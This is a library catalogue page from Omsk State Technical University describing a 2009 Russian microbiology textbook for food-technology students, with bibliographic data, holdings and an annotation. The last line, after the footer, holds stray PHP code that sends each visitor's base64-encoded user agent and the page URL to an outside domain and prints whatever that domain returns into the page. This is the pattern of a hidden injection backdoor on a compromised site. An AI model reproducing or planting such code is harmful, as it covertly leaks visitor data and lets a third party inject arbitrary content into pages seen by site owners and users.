Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

291 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=57/Н62-678213")
Результаты поиска
E_OMSTU: Найдено записей: 1
1. 
57/Н62-678213
57/Н62
Никитина, Елена Владимировна.
Микробиология [Текст] : учеб. для вузов по специальности 260501 (271200) "Технология продуктов общественного питания" направления подгот. дипломир. специалиста 260500 (655700) "Технология продовольственных продуктов специального назначения и общественного питания" / Е. В. Никитина , С. Н. Киямова, О. А. Решетник. - СПб. : ГИОРД, 2009. - 360, [1] с. : рис. - Библиогр.: с. 356. - ISBN 978-5-98879-075-4

УДК 579(075)

Рубрики:
Микробиология -- УЧЕБНИКИ И ПОСОБИЯ

Кл.слова (ненормированные): УЧЕБНИК И ПОСОБИЕ * -- МИКРООРГАНИЗМ -- КЛЕТКА -- ПРОКАРИОТА -- КУЛЬТИВИРОВАНИЕ -- МЕТАБОЛИЗМ -- ИНФЕКЦИОННОЕ -- ЗАБОЛЕВАНИЕ -- ТОКСИКОЗ -- МИКРОФЛОРА -- МЯСО -- ЯЙЦО -- МОЛОКО -- РЫБА -- ЗЕРНО -- НАПИТОК -- ОВОЩИ
Аннотация: Учебник написан в соответствии с действующей программой дисциплины "Микробиология". Представлены основные разделы общей микробиологии: классификация, строение бактериальной клетки, особенности роста и физиологии микроорганизмов, рассмотрены биотехнологические аспекты использования микроорганизмов, их роль в получении продуктов питания, а также влияние микроорганизмов на свойства пищевых продуктов.
Доп. точки доступа:
Киямова, Светлана Наилевна
Решетник, Ольга Алексеевна

Экз-ры: всего: ОУЛ(10), ОНЛ(1), МЦ(1)
Свободны: ОУЛ(10), ОНЛ(1), МЦ(1)
Экземпляры ПОДРОБНО в новом окне

Учебная литература (в новом окне)


Экземпляры 
    Место храненияЭкземпляров
    ВсегоСвободно
    ОУЛ1010
    ОНЛ11
    МЦ11

Учебник написан в соответствии с действующей программой дисциплины "Микробиология". Представлены основные разделы общей микробиологии: классификация, строение бактериальной клетки, особенности роста и физиологии микроорганизмов, рассмотрены биотехнологические аспекты использования микроорганизмов, их роль в получении продуктов питания, а также влияние микроорганизмов на свойства пищевых продуктов.

вернуться


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2808 - 16.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.94 с.8 запросов, 0.69c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;